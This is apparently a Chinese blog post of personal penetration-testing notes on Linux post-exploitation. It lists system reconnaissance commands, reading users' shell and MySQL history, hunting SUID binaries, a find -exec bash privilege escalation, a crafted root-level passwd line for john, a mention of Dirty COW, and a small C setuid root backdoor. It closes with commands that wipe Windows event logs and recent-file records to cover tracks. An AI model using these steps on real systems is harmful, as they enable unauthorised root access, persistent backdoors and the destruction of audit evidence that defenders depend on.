内网渗透笔记——与linux相关

信息收集相关命令

查看内核/系统

uname -a
cat /proc/version
hostnamectl
dmesg | grep Linux

lsb_release -a

redhat 红帽下专用命令
    cat /etc/redhat-release

getconf LONG_BIT  查看操作系统位数
cat /etc/*release    查看linux发行版信息

查看操作记录

cat ~/.zsh_history
cat ~/.mysql_history
dpkg -l nmap  查找软件版本

         预期状态(最前面的第一个字母)
         当前状态(最前面的第二个字母):(i)已安装;(n)未安装

权限

-rwx r-x r-x

-:文件类型(-:文件;d:目录;l:lnk文件 软/硬链接)
rwx:当前用户
r-x:同组用户
r-x:其他用户

s权限:在执行该程序的时候,会以文件所有者的权限去执行

root:chmod u+s fileName
- rws --- --- fileName

user$: ./fileName = root#: ./fileName      普通用户user执行filename的时候等于root执行

提权

find命令:

find / -perm -u=s -type f 2>/dev/null   查找有s权限的文件,将错误输出输出到空栈


sudo -l   看看我们能用sudo执行哪些东西(sudo:以管理员身份运行程序)

find 1.txt -exec /bin/bash -p \;(奇怪的操作,先给find赋予s权限,然后利用find的参数-exec去运行bash文件,是以管理员身份去运行)

john 密码爆破工具

echo ajie:SGHLWPbYfiLLg:0:0:sajiea:/root:/bin/bash > pass
john pass

脏牛漏洞

## 脏牛漏洞

编号:CVE-2016-5195

影响范围:2016前十年的linux版本,安卓android

效果:覆盖root用户,重新生成指定用户并且带有特权

在野利用:官方未公布,少数人知道

exp交易:暗网

表层:常规网站

深网:后台等一些看不见的

暗网:需要特殊渠道

简单提权后门

#include<stdio.h>
#include<stdlib.h>
int main(){

        setuid(0);
        system("/bin/bash -p");
}

清除痕迹

msf:clearev

windows:

wevtutil:
    wevtutil el                    查看所有日志
    wevtutil cl    system            清除系统日志
    wevtutil cl application        清除应用程序日志
    wevtutil cl security        清除安全日志
    
recent(最近操作记录)
    del /f /s /q "%userprofile%\recent\*.\*"

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值